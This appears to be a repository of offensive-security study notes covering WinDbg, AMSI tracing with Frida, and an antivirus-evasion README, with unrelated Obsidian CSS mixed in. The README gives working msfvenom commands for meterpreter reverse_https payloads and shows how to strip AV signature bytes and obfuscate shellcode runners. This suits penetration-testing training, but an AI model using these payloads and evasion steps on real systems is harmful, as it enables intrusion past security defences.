-------------------------------------------------------------------------------- 1 | # Intel Architecture and Windows 10 2 | 3 | There are two primary assembly syntaxes : 4 | 5 | - Intel 6 | - x86 (32-bit) 7 | - x86_64 (64-bit) 8 | - AT&T 9 | 10 | ## Intel Architecture 11 | 12 | In the Intel assembly languages, both the 32-bit and the 64-bit are quite similar at assembly level and make use of stack, heap and registers to carry out different instructions. The 64-bit version is just an extension to the 32-bit version. 13 | 14 | Memory space supported : 15 | 16 | 32 bit - 2 GB \ 17 | 64 bit - 128 TB 18 | 19 | The registers in the 32-bit environment can be found in the below table : 20 | 21 | ![32-bit-cpu-registers](./images/Windbg/32-bit.png) 22 | 23 | The registers in the 64-bit environment can be found in the below table : 24 | 25 | ![64-bit-cpu-registers](./images/Windbg/64-bit.png) 26 | 27 | The most important registers in the 32-bit are the ESP and the EIP. They are the Stack pointer and the Instruction pointer. Their 64-bit counterparts are the RSP and the RIP. 28 | 29 | ESP/RSP - Memory address to the top of the stack 30 | EIP/RIP - Address of the assembly instruction to be executed. 31 | 32 | Two types of instructions : 33 | 34 | - Function calls 35 | - Conditional Branching 36 | 37 | ## Intro to Windbg 38 | 39 | Windbg can be found on the microsoft store. It supports 32-bit and 64-bit. Open notepad and start windbg 40 | 41 | ![windbg-search](./images/Windbg/windbg-search.png) 42 | 43 | Go to File > Start Debugging > Attach to a process 44 | 45 | ![process-search](./images/Windbg/search-process.png) 46 | 47 | Below we can see the interface with the attached process. The process execution is paused. Now let us set a breakpoint at the WriteFile Function. The breakpoint will be encountered when the process writes something to the file. 48 | 49 | > **bp** is used to set breakpoint \ 50 | > **kernel32** is the dynamic link library(DLL) which exports the **WriteFile** function \ 51 | > **WriteFile** is the function that gets called when anything is written onto the disk \ 52 | > **g** is used to resume the execution after the breakpoint has been hit \ 53 | > **p** is used to step through a single assembly instruction at a time \ 54 | > **r** is used to view all registers 55 | 56 | 57 | ![write-file-breakpoint](./images/Windbg/create-breakpoint.png) 58 | 59 | Now resume the execution. Write something on notepad to trigger the breakpoint. 60 | 61 | ![breakpoint-hit](./images/Windbg/breakpoint-hit.png) 62 | 63 | Now we can go step-by-step to the next instruction with the 'p' command. 64 | 65 | ![move-through-instructions](./images/Windbg/move-through-instructions.png) 66 | 67 | We can view the next 7 instructions with the 'u' command which stands for unassemble. 68 | 69 | ![view-7-instructions](./images/Windbg/view-7-instructions.png) 70 | 71 | We can also view all the registers with the 'r' command. 72 | 73 | ![view-registers](./images/Windbg/view-registers.png) 74 | 75 | We can get the detailed view of the registers using the dd, dc and dq command. 76 | 77 | dd - 32 bit 78 | dc - 32 bit with ASCII 79 | dq - 64 bit 80 | 81 | ![detailed-view](./images/Windbg/detailed-view.png) 82 | 83 | Finally we can also modify the stack with the 'ed' command. 84 | 85 | ![modify-stack](./images/Windbg/modify-stack.png) 86 | 87 | > RESOURCES : 88 | > 89 | > - https://en.wikipedia.org/wiki/X86 90 | > - https://en.wikipedia.org/wiki/Assembly_language 91 | > - https://en.wikipedia.org/wiki/X86-64 92 | > - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/methods-of-controlling-breakpoints 93 | > - https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-writefile?redirectedfrom=MSDN 94 | 95 |   96 | 97 | # AntiMalware Scan Interface 98 | 99 | ## Basic Understanding 100 | 101 | The AntiMalware Scan Interface, aka AMSI was introduced by Microsoft to allow runtime inspection of PowerShell commands and scripts. It captures all scripts, like C#, VBA, PowerShell etc. and send them to the AV for scanning. 102 | 103 | The AMSI interacts with the Antivirus software with Remote Procedure Calls, RPC. 104 | 105 | ![flowchart](./images/AMSI/flowchart.png) 106 | 107 | The unmanaged DLL, AMSI.dll, is loaded into every PowerShell process and provides a number of APIs which PowerShell uses. The APIs exported by AMSI are _AmsiInitialize_, _AmsiOpenSession_, _AmsiScanString_, _AmsiScanBuffer_ and _AmsiCloseSession_. 108 | 109 | **_AmsiInitialize_** 110 | 111 | Function : 112 | 113 | HRESULT AmsiInitialize( 114 | LPCWSTR appName, 115 | HAMSICONTEXT \*amsiContext 116 | ); 117 | 118 | Explanation : 119 | 120 | 1. The first argument is the name of the application. 121 | 2. The next argument is the pointer to the context structure. 122 | 123 |   124 | 125 | > **NOTE** : The call to _AmsiInitialize_ is made before we can invoke any powershell command, hence we cannot influence it in any way. 126 | 127 |   128 | 129 | **_AmsiOpenSession_** 130 | 131 | Function : 132 | 133 | HRESULT AmsiOpenSession( 134 | HAMSICONTEXT amsiContext, 135 | HAMSISESSION \*amsiSession 136 | ); 137 | 138 | Explanation : 139 | 140 | 1. The first argument takes the _AmsiContext_ context structure. 141 | 2. The second argument accepts this context and creates a session for it. This session structure will be used in all calls for that session. 142 | 143 |   144 | 145 | **_AmsiScanBuffer_** 146 | 147 | Function : 148 | 149 | HRESULT AmsiScanBuffer( 150 | HAMSICONTEXT amsiContext, 151 | PVOID buffer, 152 | ULONG length, 153 | LPCWSTR contentName, 154 | HAMSISESSION amsiSession, 155 | AMSI_RESULT *result 156 | ); 157 | 158 | Explanation : 159 | 160 | 1. The first argument handles the context recieved from _AmsiInitialize_ 161 | 2. The second argument stores the buffer which has to be scanned. 162 | 3. The third argument stores the length of the buffer. 163 | 4. The fourth argument contains the filename/URL/unique String etc. Anything to identify the buffer being scanned. 164 | 5. The fifth argument contains the session recieved by the _AmsiOpenSession_. It is used if multiple scan requests are to be done within a session, otherwise it is set to **nullptr** 165 | 6. The sixth argument stores the result of the scan. If it returns "1", then it indicates clean scan and a return value of "32768" indicates the presence of malware. 166 | 167 | > NOTE : 168 | > 169 | > - Once the session is over, the _AmsiCloseSession_ will close the current AMSI scanning Session. 170 | > - The _AmsiScanBuffer_ precedes the _AmsiScanString_ as the latter was vulnerable to trivial AMSI bypass attacks. 171 | 172 |   173 | 174 | > RESOURCES : 175 | > 176 | > - https://docs.microsoft.com/en-us/windows/win32/api/amsi/nf-amsi-amsiinitialize 177 | > - https://docs.microsoft.com/en-us/windows/win32/api/amsi/nf-amsi-amsiopensession 178 | > - https://docs.microsoft.com/en-us/windows/win32/api/amsi/nf-amsi-amsiscanstring 179 | > - https://docs.microsoft.com/en-us/windows/win32/api/amsi/nf-amsi-amsiscanbuffer 180 | > - https://docs.microsoft.com/en-us/windows/win32/api/amsi/nf-amsi-amsiclosesession 181 | > - https://docs.microsoft.com/en-gb/windows/win32/api/amsi/ne-amsi-amsi_result 182 | 183 |   184 | 185 | ## Dynamic Analysis of AMSI with Frida 186 | 187 | Frida is a debugging tool with a dynamic instrumentation framework. It has a python backend with a JavaScript frontend. 188 | 189 | Command to install Frida : 190 | 191 | pip install frida-tools 192 | 193 | Also add the path to your Environment variables. Go to System Properties > Environment Variables > Path 194 | 195 | The path for me is : 196 | 197 | C:\Users\IEUser\AppData\Local\Programs\Python\Python310\Scripts\ 198 | 199 | This can vary according to your user and where you have python installed. 200 | 201 | Now open PowerShell and get it's process id with the command : 202 | 203 | Get-Process | Select-Object -Property Id,ProcessName | Where-Object {$_.ProcessName -like "*power*"} 204 | 205 | ![current-process](./images/AMSI/current-process.png) 206 | 207 | Open a new powershell instance and run the same command again, this time note down the new process id : 208 | 209 | ![new-process](./images/AMSI/new-process.png) 210 | 211 | Run frida-trace on the new process : 212 | 213 | ![frida-trace](./images/AMSI/frida-trace.png) 214 | 215 | Flags : 216 | 217 | -p : process id \ 218 | -x : the DLL to trace \ 219 | -i : specific API's to trace 220 | 221 | Now when we enter any string, we can see the API calls being made : 222 | 223 | ![test-string](./images/AMSI/test-string.png) 224 | 225 | When we start a Frida session, handler files are created for each hooked API : 226 | 227 | ![handlers](./images/AMSI/handlers.png) 228 | 229 | We can view the _AmsiScanBuffer_ file to see what the handler does when that API is encountered : 230 | 231 | ![amsi-scan-buffer](./images/AMSI/amsi-scan-buffer-handler.png) 232 | 233 | We can edit the _OnEnter_ function to display more information when encountered : 234 | 235 | ![onEnter](./images/AMSI/onEnter.png) 236 | 237 | Explanation : 238 | 239 | 1. The values of different argument of the API are stored in the **_args_** variable. 240 | 2. The readUtf16String is to print out the content in Unicode format. 241 | 3. The last argument is the resultPointer for the result of the Amsi scan. It is a javascript variable and we can use the "this" keyword to access it later. 242 | 243 | Similarly we can edit the _onLeave_ function : 244 | 245 | ![onLeave](./images/AMSI/onLeave.png) 246 | 247 | Explanation : 248 | 249 | 1. We use the "this" keyword to get the result of the resultPointer. 250 | 2. We use readUShort to print out the result to the console. 251 | 252 | Now let us test out this code by entering a random string : 253 | 254 | ![random-string](./images/AMSI/random-string.png) 255 | 256 | > **NOTE** : We can see that the result is "1", which says the entered text did not trigger any AV. 257 | 258 | Now let us try the same with a string which may get flagged : 259 | 260 | ![mal-string](./images/AMSI/mal-string.png) 261 | 262 | We can see that the result is "32768" and also we got a malicious activity error on our powershell. 263 | 264 | Now tring to bypass this by splitting and concatenating the string : 265 | 266 | ![split-bypass](./images/AMSI/split-bypass.png) 267 | 268 |   269 | 270 | > RESOURCES : 271 | > 272 | > - https://www.frida.re/docs/javascript-api/#memory 273 | > - https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/this 274 | > - https://www.frida.re/ 275 | 276 |   277 | 278 | # Bypassing AMSI with Reflection 279 | 280 | ## Messing around with AMSI functions 281 | -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-git/styles.css: -------------------------------------------------------------------------------- 1 | @keyframes loading { 2 | 0% { 3 | transform: rotate(0deg); 4 | } 5 | 6 | 100% { 7 | transform: rotate(360deg); 8 | } 9 | } 10 | 11 | .workspace-leaf-content[data-type='git-view'] .view-content { 12 | padding: 0; 13 | } 14 | 15 | .workspace-leaf-content[data-type='git-history-view'] .view-content { 16 | padding: 0; 17 | } 18 | 19 | .loading>svg { 20 | animation: 2s linear infinite loading; 21 | transform-origin: 50% 50%; 22 | display: inline-block; 23 | } 24 | 25 | .obsidian-git-center { 26 | margin: auto; 27 | text-align: center; 28 | width: 50%; 29 | } 30 | 31 | .obsidian-git-textarea { 32 | display: block; 33 | margin-left: auto; 34 | margin-right: auto; 35 | } 36 | 37 | .obsidian-git-center-button { 38 | display: block; 39 | margin: 20px auto; 40 | } 41 | 42 | .tooltip.mod-left { 43 | overflow-wrap: break-word; 44 | } 45 | 46 | .tooltip.mod-right { 47 | overflow-wrap: break-word; 48 | } 49 | .git-tools { 50 | display: flex; 51 | margin-left: auto; 52 | } 53 | .git-tools .type { 54 | padding-left: var(--size-2-1); 55 | display: flex; 56 | align-items: center; 57 | justify-content: center; 58 | width: 11px; 59 | } 60 | 61 | .git-tools .type[data-type="M"] { 62 | color: orange; 63 | } 64 | .git-tools .type[data-type="D"] { 65 | color: red; 66 | } 67 | .git-tools .buttons { 68 | display: flex; 69 | } 70 | .git-tools .buttons > * { 71 | padding: 0 0; 72 | height: auto; 73 | } 74 | 75 | .workspace-leaf-content[data-type="diff-view"] .d2h-d-none { 76 | display: none; 77 | } 78 | 79 | .workspace-leaf-content[data-type="diff-view"] .d2h-wrapper { 80 | text-align: left; 81 | } 82 | 83 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-header { 84 | background-color: var(--background-primary); 85 | border-bottom: 1px solid var(--interactive-accent); 86 | font-family: var(--font-monospace); 87 | height: 35px; 88 | padding: 5px 10px; 89 | } 90 | 91 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-header, 92 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-stats { 93 | display: -webkit-box; 94 | display: -ms-flexbox; 95 | display: flex; 96 | } 97 | 98 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-stats { 99 | font-size: 14px; 100 | margin-left: auto; 101 | } 102 | 103 | .workspace-leaf-content[data-type="diff-view"] .d2h-lines-added { 104 | border: 1px solid #b4e2b4; 105 | border-radius: 5px 0 0 5px; 106 | color: #399839; 107 | padding: 2px; 108 | text-align: right; 109 | vertical-align: middle; 110 | } 111 | 112 | .workspace-leaf-content[data-type="diff-view"] .d2h-lines-deleted { 113 | border: 1px solid #e9aeae; 114 | border-radius: 0 5px 5px 0; 115 | color: #c33; 116 | margin-left: 1px; 117 | padding: 2px; 118 | text-align: left; 119 | vertical-align: middle; 120 | } 121 | 122 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-name-wrapper { 123 | -webkit-box-align: center; 124 | -ms-flex-align: center; 125 | align-items: center; 126 | display: -webkit-box; 127 | display: -ms-flexbox; 128 | display: flex; 129 | font-size: 15px; 130 | width: 100%; 131 | } 132 | 133 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-name { 134 | overflow-x: hidden; 135 | text-overflow: ellipsis; 136 | white-space: nowrap; 137 | } 138 | 139 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-wrapper { 140 | border: 1px solid var(--background-modifier-border); 141 | border-radius: 3px; 142 | margin-bottom: 1em; 143 | } 144 | 145 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-collapse { 146 | -webkit-box-pack: end; 147 | -ms-flex-pack: end; 148 | -webkit-box-align: center; 149 | -ms-flex-align: center; 150 | align-items: center; 151 | border: 1px solid var(--background-modifier-border); 152 | border-radius: 3px; 153 | cursor: pointer; 154 | display: none; 155 | font-size: 12px; 156 | justify-content: flex-end; 157 | padding: 4px 8px; 158 | } 159 | 160 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-collapse.d2h-selected { 161 | background-color: #c8e1ff; 162 | } 163 | 164 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-collapse-input { 165 | margin: 0 4px 0 0; 166 | } 167 | 168 | .workspace-leaf-content[data-type="diff-view"] .d2h-diff-table { 169 | border-collapse: collapse; 170 | font-family: Menlo, Consolas, monospace; 171 | font-size: 13px; 172 | width: 100%; 173 | } 174 | 175 | .workspace-leaf-content[data-type="diff-view"] .d2h-files-diff { 176 | width: 100%; 177 | } 178 | 179 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-diff { 180 | overflow-y: hidden; 181 | } 182 | 183 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-side-diff { 184 | display: inline-block; 185 | margin-bottom: -8px; 186 | margin-right: -4px; 187 | overflow-x: scroll; 188 | overflow-y: hidden; 189 | width: 50%; 190 | } 191 | 192 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-line { 193 | padding: 0 8em; 194 | } 195 | 196 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-line, 197 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-line { 198 | display: inline-block; 199 | -webkit-user-select: none; 200 | -moz-user-select: none; 201 | -ms-user-select: none; 202 | user-select: none; 203 | white-space: nowrap; 204 | width: 100%; 205 | } 206 | 207 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-line { 208 | padding: 0 4.5em; 209 | } 210 | 211 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-line-ctn { 212 | word-wrap: normal; 213 | background: none; 214 | display: inline-block; 215 | padding: 0; 216 | -webkit-user-select: text; 217 | -moz-user-select: text; 218 | -ms-user-select: text; 219 | user-select: text; 220 | vertical-align: middle; 221 | white-space: pre; 222 | width: 100%; 223 | } 224 | 225 | .theme-light .workspace-leaf-content[data-type="diff-view"] .d2h-code-line del, 226 | .theme-light .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-line del { 227 | background-color: #ffb6ba; 228 | } 229 | 230 | .theme-dark .workspace-leaf-content[data-type="diff-view"] .d2h-code-line del, 231 | .theme-dark .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-line del { 232 | background-color: #8d232881; 233 | } 234 | 235 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-line del, 236 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-line ins, 237 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-line del, 238 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-line ins { 239 | border-radius: 0.2em; 240 | display: inline-block; 241 | margin-top: -1px; 242 | text-decoration: none; 243 | vertical-align: middle; 244 | } 245 | 246 | .theme-light .workspace-leaf-content[data-type="diff-view"] .d2h-code-line ins, 247 | .theme-light .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-line ins { 248 | background-color: #97f295; 249 | text-align: left; 250 | } 251 | 252 | .theme-dark .workspace-leaf-content[data-type="diff-view"] .d2h-code-line ins, 253 | .theme-dark .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-line ins { 254 | background-color: #1d921996; 255 | text-align: left; 256 | } 257 | 258 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-line-prefix { 259 | word-wrap: normal; 260 | background: none; 261 | display: inline; 262 | padding: 0; 263 | white-space: pre; 264 | } 265 | 266 | .workspace-leaf-content[data-type="diff-view"] .line-num1 { 267 | float: left; 268 | } 269 | 270 | .workspace-leaf-content[data-type="diff-view"] .line-num1, 271 | .workspace-leaf-content[data-type="diff-view"] .line-num2 { 272 | -webkit-box-sizing: border-box; 273 | box-sizing: border-box; 274 | overflow: hidden; 275 | padding: 0 0.5em; 276 | text-overflow: ellipsis; 277 | width: 3.5em; 278 | } 279 | 280 | .workspace-leaf-content[data-type="diff-view"] .line-num2 { 281 | float: right; 282 | } 283 | 284 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-linenumber { 285 | background-color: var(--background-primary); 286 | border: solid var(--background-modifier-border); 287 | border-width: 0 1px; 288 | -webkit-box-sizing: border-box; 289 | box-sizing: border-box; 290 | color: var(--text-muted); 291 | cursor: pointer; 292 | display: inline-block; 293 | position: absolute; 294 | text-align: right; 295 | width: 7.5em; 296 | } 297 | 298 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-linenumber:after { 299 | content: "\200b"; 300 | } 301 | 302 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-linenumber { 303 | background-color: var(--background-primary); 304 | border: solid var(--background-modifier-border); 305 | border-width: 0 1px; 306 | -webkit-box-sizing: border-box; 307 | box-sizing: border-box; 308 | color: var(--text-muted); 309 | cursor: pointer; 310 | display: inline-block; 311 | overflow: hidden; 312 | padding: 0 0.5em; 313 | position: absolute; 314 | text-align: right; 315 | text-overflow: ellipsis; 316 | width: 4em; 317 | } 318 | 319 | .workspace-leaf-content[data-type="diff-view"] .d2h-diff-tbody tr { 320 | position: relative; 321 | } 322 | 323 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-linenumber:after { 324 | content: "\200b"; 325 | } 326 | 327 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-emptyplaceholder, 328 | .workspace-leaf-content[data-type="diff-view"] .d2h-emptyplaceholder { 329 | background-color: var(--background-primary); 330 | border-color: var(--background-modifier-border); 331 | } 332 | 333 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-line-prefix, 334 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-linenumber, 335 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-linenumber, 336 | .workspace-leaf-content[data-type="diff-view"] .d2h-emptyplaceholder { 337 | -webkit-user-select: none; 338 | -moz-user-select: none; 339 | -ms-user-select: none; 340 | user-select: none; 341 | } 342 | 343 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-linenumber, 344 | .workspace-leaf-content[data-type="diff-view"] .d2h-code-side-linenumber { 345 | direction: rtl; 346 | } 347 | 348 | .theme-light .workspace-leaf-content[data-type="diff-view"] .d2h-del { 349 | background-color: #fee8e9; 350 | border-color: #e9aeae; 351 | } 352 | 353 | .theme-light .workspace-leaf-content[data-type="diff-view"] .d2h-ins { 354 | background-color: #dfd; 355 | border-color: #b4e2b4; 356 | } 357 | 358 | .theme-dark .workspace-leaf-content[data-type="diff-view"] .d2h-del { 359 | background-color: #521b1d83; 360 | border-color: #691d1d73; 361 | } 362 | 363 | .theme-dark .workspace-leaf-content[data-type="diff-view"] .d2h-ins { 364 | background-color: rgba(30, 71, 30, 0.5); 365 | border-color: #13501381; 366 | } 367 | 368 | .workspace-leaf-content[data-type="diff-view"] .d2h-info { 369 | background-color: var(--background-primary); 370 | border-color: var(--background-modifier-border); 371 | color: var(--text-normal); 372 | } 373 | 374 | .theme-light .workspace-leaf-content[data-type="diff-view"] .d2h-file-diff .d2h-del.d2h-change { 375 | background-color: #fdf2d0; 376 | } 377 | 378 | .theme-dark .workspace-leaf-content[data-type="diff-view"] .d2h-file-diff .d2h-del.d2h-change { 379 | background-color: #55492480; 380 | } 381 | 382 | .theme-light .workspace-leaf-content[data-type="diff-view"] .d2h-file-diff .d2h-ins.d2h-change { 383 | background-color: #ded; 384 | } 385 | 386 | .theme-dark .workspace-leaf-content[data-type="diff-view"] .d2h-file-diff .d2h-ins.d2h-change { 387 | background-color: rgba(37, 78, 37, 0.418); 388 | } 389 | 390 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-list-wrapper { 391 | margin-bottom: 10px; 392 | } 393 | 394 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-list-wrapper a { 395 | color: #3572b0; 396 | text-decoration: none; 397 | } 398 | 399 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-list-wrapper a:visited { 400 | color: #3572b0; 401 | } 402 | 403 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-list-header { 404 | text-align: left; 405 | } 406 | 407 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-list-title { 408 | font-weight: 700; 409 | } 410 | 411 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-list-line { 412 | display: -webkit-box; 413 | display: -ms-flexbox; 414 | display: flex; 415 | text-align: left; 416 | } 417 | 418 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-list { 419 | display: block; 420 | list-style: none; 421 | margin: 0; 422 | padding: 0; 423 | } 424 | 425 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-list>li { 426 | border-bottom: 1px solid var(--background-modifier-border); 427 | margin: 0; 428 | padding: 5px 10px; 429 | } 430 | 431 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-list>li:last-child { 432 | border-bottom: none; 433 | } 434 | 435 | .workspace-leaf-content[data-type="diff-view"] .d2h-file-switch { 436 | cursor: pointer; 437 | display: none; 438 | font-size: 10px; 439 | } 440 | 441 | .workspace-leaf-content[data-type="diff-view"] .d2h-icon { 442 | fill: currentColor; 443 | margin-right: 10px; 444 | vertical-align: middle; 445 | } 446 | 447 | .workspace-leaf-content[data-type="diff-view"] .d2h-deleted { 448 | color: #c33; 449 | } 450 | 451 | .workspace-leaf-content[data-type="diff-view"] .d2h-added { 452 | color: #399839; 453 | } 454 | 455 | .workspace-leaf-content[data-type="diff-view"] .d2h-changed { 456 | color: #d0b44c; 457 | } 458 | 459 | .workspace-leaf-content[data-type="diff-view"] .d2h-moved { 460 | color: #3572b0; 461 | } 462 | 463 | .workspace-leaf-content[data-type="diff-view"] .d2h-tag { 464 | background-color: var(--background-primary); 465 | display: -webkit-box; 466 | display: -ms-flexbox; 467 | display: flex; 468 | font-size: 10px; 469 | margin-left: 5px; 470 | padding: 0 2px; 471 | } 472 | 473 | .workspace-leaf-content[data-type="diff-view"] .d2h-deleted-tag { 474 | border: 2px solid #c33; 475 | } 476 | 477 | .workspace-leaf-content[data-type="diff-view"] .d2h-added-tag { 478 | border: 1px solid #399839; 479 | } 480 | 481 | .workspace-leaf-content[data-type="diff-view"] .d2h-changed-tag { 482 | border: 1px solid #d0b44c; 483 | } 484 | 485 | .workspace-leaf-content[data-type="diff-view"] .d2h-moved-tag { 486 | border: 1px solid #3572b0; 487 | } 488 | 489 | /* ====================== Line Authoring Information ====================== */ 490 | 491 | .cm-gutterElement.obs-git-blame-gutter { 492 | /* Add background color to spacing inbetween and around the gutter for better aesthetics */ 493 | border-width: 0px 2px 0.2px 2px; 494 | border-style: solid; 495 | border-color: var(--background-secondary); 496 | background-color: var(--background-secondary); 497 | } 498 | 499 | .cm-gutterElement.obs-git-blame-gutter > div, .line-author-settings-preview { 500 | /* delegate text color to settings */ 501 | color: var(--obs-git-gutter-text); 502 | font-family: monospace; 503 | height: 100%; /* ensure, that age-based background color occupies entire parent */ 504 | text-align: right; 505 | padding: 0px 6px 0px 6px; 506 | white-space: pre; /* Keep spaces and do not collapse them. */ 507 | } 508 | -------------------------------------------------------------------------------- /Antivirus Evasion/README.md: -------------------------------------------------------------------------------- 1 | # Overview 2 | 3 | An AV Software can integrate the following methods into detecting malicious files :- 4 | 5 | 1. Signature Based Scanning 6 | - Often relies on SHA-1 or MD5 hashes. 7 | - It also uses certain unique byte sequences from malicious files for detection. 8 | 2. Behavioral Analysis 9 | - Runs file and a sandboxed environment 10 | - New approach uses Cloud Computing and Artificial Intelligence for better accuracy 11 | 12 | For our testing we will rely on :- 13 | 14 | - clamav command line tool 15 | - Avira AV 16 | - Antiscan.me 17 | - Virustotal (This distributes samples to AV vendors) (Use with caution) 18 | 19 |   20 | 21 | # Signature Based Detection 22 | 23 | Initial signature based scans can be bypassed by just changing a few bytes of the file. 24 | 25 | Scanning based on byte strings are much harder to bypass as we have to find the exact set of bytes which trigger the AV. 26 | 27 | To bypass Signature based scans which look for particular byte strings in the file, we can search for such bytes which trigger the AV and replace them with an alternative. 28 | 29 | To do this, we can split the binary into many pieces and perform scans on each one of them. We can recursively do this to replace all the bytes which trigger the AV with a null byte. We also have to set the last byte to 0xFF to bypass the complete file getting detected. 30 | 31 | To split the binary, we can use the powershell tool [Find-AVSignature](./../Tools/AV%20Evasion/Find-AVSignature.ps1). Example command :- 32 | 33 | Find-AVSignature -StartByte 0 -EndByte max -Interval 100 -Path mal.exe -OutPath mal_1 -Verbose -Force 34 | 35 | Explanation : 36 | 37 | - We first have to import the module onto our current powershell session using the command . .\Find-AVSignature.ps1 38 | - The StartByte and Endbyte specify the range through which we want to split the binary, here it is from 0 to max. 39 | - The Interval argument sets the intervals in which the file should be split. 40 | - The OutPath specifies the directory to which the split binaries should be stored 41 | 42 | We can then use clamscan on this directory to see which file triggers the AV. Example command :- 43 | 44 | PS C:> .\clamscan.exe mal_1 45 | 46 | We can then slowly narrow our search and reduce the interval as we go. To replace the bytes we can use the powershell command :- 47 | 48 | $bytes = [System.IO.File]::ReadAllBytes("mal.exe") 49 | $bytes[1111] = 0 50 | [System.IO.File]::WriteAllBytes("mal_mod.exe", $bytes) 51 | 52 | Explanation : 53 | 54 | - Suppose at byte 1111, the AV was getting triggered. 55 | - We would first convert the whole binary into bytes and store it in a variable 56 | - We then would replace the location with a 0 57 | - Now we would write the bytes into a new file 58 | - Splitting and passing this through clamscan again, the byte would not trigger the AV. 59 | 60 |   61 | 62 | # Bypassing AV with Metasploit 63 | 64 | ## Encoders 65 | 66 | We can use encoders in metasploit while creating our payload to bypass Signature Based Detection. These are a wide range encoders offered by metasploit. We can list all the encoders using this command :- 67 | 68 | msfvenom -l encoders 69 | 70 | _shikata_ga_nai_ is a famous encoder, but it is only made for 32-bit systems. For 64-bit systems we can use _zutto_dekiro_ which is similar to _shikata_ga_nai_ 71 | 72 | The command for the above encoders are given below : 73 | 74 | msfvenom -p windows/meterpreter/reverse_https LHOST= LPORT= -e x86/shikata_ga_nai -f exe -o met_shikata.exe 75 | 76 | msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT= -e x64/zutto_dekiru -f exe -o met_zekiro.exe 77 | 78 | > We can also add the **-i** option to specify the number of iterations the encoder will run. 79 | > The **-x** option can be added to used to give a template to the msfvenom command. 80 | 81 | **NOTE** : As of now, encoders are mainly used to get around bad characters in a shellcode and serve little purpose in bypassing AntiVirus due to their ineffectiveness against the modern AV solutions. 82 | 83 | > RESOURCES 84 | > 85 | > - https://danielsauder.com/2015/08/26/an-analysis-of-shikata-ga-nai/ 86 | > - https://www.boozallen.com/insights/cyber/tech/zutto-dekiru-encoder-explained.html 87 | > - https://www.rapid7.com/blog/post/2012/12/14/the-odd-couple-metasploit-and-antivirus-solutions/ 88 | 89 |   90 | 91 | ## Encrypters 92 | 93 | We can list the encrypters offered by metasploit with the following command: 94 | 95 | msfvenom -l encrypt 96 | 97 | A sample command using an encrypter : 98 | 99 | msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT= --encrypt aes256 --encrypt-key -f exe -o mal_aes.exe 100 | 101 | This will however get detected due to it's static decryption process. Heurestic scans can easily find out that the file contains malware. 102 | 103 | > RESOURCES 104 | > 105 | > - https://www.offensive-security.com/metasploit-unleashed/msfvenom/ 106 | > - https://www.rapid7.com/blog/post/2018/05/03/hiding-metasploit-shellcode-to-evade-windows-defender/ 107 | > - https://www.rapid7.com/blog/post/2019/11/21/metasploit-shellcode-grows-up-encrypted-and-authenticated-c-shells/ 108 | 109 |   110 | 111 | # Bypasssing AV with C# 112 | 113 | ## Caesar cipher with XOR-based and AND-based encryption 114 | 115 | Let us take a custom written simple C# shellcode runner. 116 | 117 | You can find the program [here](./C%23%20Programs/ShellcodeRunner.cs) 118 | 119 | Explanation : 120 | 121 | - We create a simple C# shellcode runner which uses the Win32 APIs. 122 | - We first allocate space, copy the shellcode into it and then execute it. 123 | - The _WaitForSingleObject_ API prevents the shell from exiting as soon as it is created. 124 | - Detailed explanation of different APIs can be found [here](./../Client-Side-Code-Execution-With-Office/README.md#in-memory-shellcode-runner-in-vba) 125 | 126 | We have encrypted it with Caser Cipher along with Xor based encryption. You can find the code [here](./C%23%20Programs/XorEncoder.cs) 127 | 128 | The same program but with simple Caesar cipher can be found [here](./C%23%20Programs/CaesarEncoder.cs) 129 | 130 |   131 | 132 | > RESOURCES 133 | > 134 | > - https://en.wikipedia.org/wiki/XOR_cipher 135 | > - http://practicalcryptography.com/ciphers/caesar-cipher/ 136 | 137 |   138 | 139 | ## Sleep Timers 140 | 141 | To add on to the above encrpytion methods, we can also add sleep timers to mess with the heurestic based detection. This can easily be implemented using the _Sleep_ Win32 API from _kernel32.dll_ 142 | 143 | Simple implementation of _Sleep_ Win32 API :- 144 | 145 | ... 146 